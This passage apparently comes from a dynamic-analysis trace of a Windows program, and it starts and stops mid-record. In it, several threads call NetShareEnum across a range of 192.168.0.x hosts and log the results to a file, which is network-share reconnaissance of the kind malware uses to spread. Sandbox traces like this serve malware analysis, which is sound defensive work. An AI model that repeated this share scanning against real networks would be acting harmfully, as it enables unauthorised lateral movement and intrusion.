cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.384] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.384] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x57dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x57dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.390] NetShareEnum (in: servername="\\\\192.168.0.176", level=0x1, bufptr=0x57dfedc, prefmaxlen=0xffffffff, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc | out: bufptr=0x57dfedc, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc) returned 0x35 [0211.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.208", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.160] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.208", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.208", lpUsedDefaultChar=0x0) returned 15 [0211.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.161] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.161] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.161] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.161] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.161] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x57dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x57dfc54*=0x33, lpOverlapped=0x0) returned 1 [0211.240] NetShareEnum (in: servername="\\\\192.168.0.208", level=0x1, bufptr=0x57dfedc, prefmaxlen=0xffffffff, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc | out: bufptr=0x57dfedc, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc) returned 0x35 [0257.946] SetEvent (hEvent=0x1dc) returned 1 [0257.946] RtlExitUserThread (Status=0x0) Thread: id = 64 os_tid = 0xca8 [0088.961] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.43", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.961] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.43", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.43", lpUsedDefaultChar=0x0) returned 14 [0088.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.961] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.961] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.961] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.961] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.961] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x591fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x591fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.966] NetShareEnum (in: servername="\\\\192.168.0.43", level=0x1, bufptr=0x591fedc, prefmaxlen=0xffffffff, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc | out: bufptr=0x591fedc, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc) returned 0x35 [0144.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.102", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.102", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.102", lpUsedDefaultChar=0x0) returned 15 [0144.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.345] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x591fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x591fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.349] NetShareEnum (in: servername="\\\\192.168.0.102", level=0x1, bufptr=0x591fedc, prefmaxlen=0xffffffff, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc | out: bufptr=0x591fedc, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc) returned 0x35 [0178.377] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.175", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.377] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.175", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.175", lpUsedDefaultChar=0x0) returned 15 [0178.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.378] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.378] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.378] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.378] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.378] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x591fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x591fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.381] NetShareEnum (in: servername="\\\\192.168.0.175", level=0x1, bufptr=0x591fedc, prefmaxlen=0xffffffff, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc | out: bufptr=0x591fedc, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc) returned 0x35 [0211.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.207", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.207", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.207", lpUsedDefaultChar=0x0) returned 15 [0211.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x591ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.156] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x591fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x591fc54*=0x22, lpOverlapped=0x0) returned 1 [0211.233] NetShareEnum (in: servername="\\\\192.168.0.207", level=0x1, bufptr=0x591fedc, prefmaxlen=0xffffffff, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc | out: bufptr=0x591fedc, entriesread=0x591fed4, totalentries=0x591fed0, resume_handle=0x591fecc) returned 0x35 [0257.948] SetEvent (hEvent=0x1dc) returned 1 [0257.948] RtlExitUserThread (Status=0x0) Thread: id = 65 os_tid = 0xcac [0088.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.44", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.44", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.44", lpUsedDefaultChar=0x0) returned 14 [0088.967] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.967] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.967] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x5a5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5a5fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.971] NetShareEnum (in: servername="\\\\192.168.0.44", level=0x1, bufptr=0x5a5fedc, prefmaxlen=0xffffffff, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc | out: bufptr=0x5a5fedc, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc) returned 0x35 [0144.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.101", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.101", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.101", lpUsedDefaultChar=0x0) returned 15 [0144.333] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.333] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.333] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5a5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5a5fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.337] NetShareEnum (in: servername="\\\\192.168.0.101", level=0x1, bufptr=0x5a5fedc, prefmaxlen=0xffffffff, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc | out: bufptr=0x5a5fedc, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc) returned 0x35 [0178.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.177", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.177", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.177", lpUsedDefaultChar=0x0) returned 15 [0178.392] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.392] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.392] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5a5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5a5fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.396] NetShareEnum (in: servername="\\\\192.168.0.177", level=0x1, bufptr=0x5a5fedc, prefmaxlen=0xffffffff, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc | out: bufptr=0x5a5fedc, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc) returned 0x35 [0211.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.226", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.226", cchWideChar=15, lpMultiByteStr=0x1e82fec, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.226", lpUsedDefaultChar=0x0) returned 15 [0211.197] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x5a5fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5a5fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.443] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.443] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5a5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.443] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.443] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.443] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5a5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5a5fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.446] NetShareEnum (in: servername="\\\\192.168.0.226", level=0x1, bufptr=0x5a5fedc, prefmaxlen=0xffffffff, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc | out: bufptr=0x5a5fedc, entriesread=0x5a5fed4, totalentries=0x5a5fed0, resume_handle=0x5a5fecc) returned 0x35 [0258.079] SetEvent (hEvent=0x1dc) returned 1 [0258.079] RtlExitUserThread (Status=0x0) Thread: id = 66 os_tid = 0xcb0 [0088.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.45", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.45", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.45", lpUsedDefaultChar=0x0) returned 14 [0088.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 